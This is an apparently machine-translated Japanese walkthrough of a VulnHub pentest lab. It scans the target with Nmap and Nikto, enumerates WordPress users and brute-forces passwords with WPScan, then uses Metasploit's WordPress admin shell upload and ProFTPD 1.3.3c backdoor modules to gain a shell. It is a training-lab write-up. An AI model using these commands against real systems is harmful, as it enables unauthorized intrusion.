
すべての良い一日。
あなたの多くはPentestについて知っています、誰かが彼に対処し、誰かがちょうど聞いて、この分野の小さな専門家のように感じたいです。 ずいぶん前、またはたぶん前のことですが、 VulnHubにそれ専用の研究所が登場しました 。
ACT I-セットアップ
仕事のために、私はもちろんKali LinuxとVirtualBoxを使用し、研究室自体も使用しました。
次に、2台の車を接続する必要があります。 簡単にするには: cmdを開き、VirtualBoxがインストールされているディレクトリに移動して、VboxManageの設定を規定します。
VBoxManageを構成するコマンドcd C:\Program Files\Oracle\VirtualBox
C:\Program Files\Oracle\VirtualBox>VBoxManage.exe dhcpserver add --netname internet --ip 10.0.1.1 --netmask 255.255.255.0 --lowerip 10.0.1.2 --upperip 10.0.1.200 --enable>

ここで、KaliとPentestの設定に、 cmdで記述したネットワークの名前を入力します

ACT II-はじめに
Kali Linuxがラボを見るかどうかを確認してください。

eth0への接続が表示されます。 次に、マシンの特定のIPを調べる必要があります。 このために、悪名高いNmapプログラムを使用します

ラボ10.0.1.2の IP
ACT III-基本的なペンテスト
Nmapが仮想ネットワークをスキャンした後、ラボで3つのポートが開いていることがわかりました。
ポート80に接続しようとしています。 これを行うには、ブラウザーを開きます(私の場合はFireFoxです)

いいね! サイトは機能しています。 どのディレクトリが非表示になっているかを確認しましょう。 これを行うには、素晴らしいniktoプログラムを使用して結果を確認します。

OSVDB-3092: /secret/: This might be interesting
秘密のディレクトリは興味深いはずです。 彼女が隠しているものを見つけましょう

もちろん、10個のうち3個に見えますが、もちろん、美しさと便利さの名の下にすべて修正できます。
最も気配りがあり、おそらくすでに推測されており、 Nmapを使用したniktoは、2回以上ヒントを与えてくれました。
- Uncommon header 'link' found, with contents: <http://vtcsec/secret/index.php/wp-json/> - Nmap scan report for vtcsec (10.0.1.2)
ターミナルを介してホストに名前を追加しましょう。
# echo "10.0.1.2 vtcsec" >> /etc/hosts
これでサイトのすべての美しさを見る準備ができました

さて、ブラッドハウンドのように、私たちはサイトのすべてのディレクトリを調べ、突かれたすべてのものを突くと、最終的にサイトがWordPressで書かれていることがわかります。 はい-はいniktoはその前に私たちに言ったが、私たちは簡単な方法を探していません。
WordPress脆弱性スキャナーを使用してみましょう-WPScan
# wpscan --url http://10.0.1.2/secret/
うーん 、すべてのユーザー名を--enumerate uフラグでリストしてみましょう。
# wpscan --url http://10.0.1.2/secret/ --enumerate u

ユーザーは1人だけです。 そのため、パスワードを微調整することができます。
# wpscan --url http://10.0.1.2/secret/ --wordlist /usr/share/wordlists/dirb/big.txt --threads 2

残念ながら、ブルータスは成功しませんでしたが、ログイン管理者とパスワード管理者のエラーという興味深いことがわかりました。
Metasploitを介したエクスプロイトを試行する必要があります
ACT IV-管理者が来ます
最初にMetasploitを構成する必要があります。
#/etc/init.d/postgresql start # msfdb init
さあ始めましょう!
# msfconsole
私たちのエクスプロイトを見つける必要があります。 検索コマンドを使用します
# search admin
リストから、 wp_admin_shell_uploadは私たちに合っています
起動してセットアップを実行します
# msf>use exploit/unix/webapp/wp_admin_shell_upload # msf>set username admin # msf>set password admin # msf>set rhost 10.0.1.2 # msf>set targeturi /secret
次のようになります。

発射!

ブラウザに移動し、admin / adminの下に移動します

ACT V-バックドアが見える
次に、ターミナルにアクセスしてみます。 これを行うには、やはりMetasploitが必要です。
# msf>use exploit/unix/ftp/proftpd_133c_backdoor
セットアップを実施
# msf>set rhost 10.0.1.2

発射! ( runの代わりにエクスプロイトを使用できます)

Tadaaam、コンソールにアクセスできました。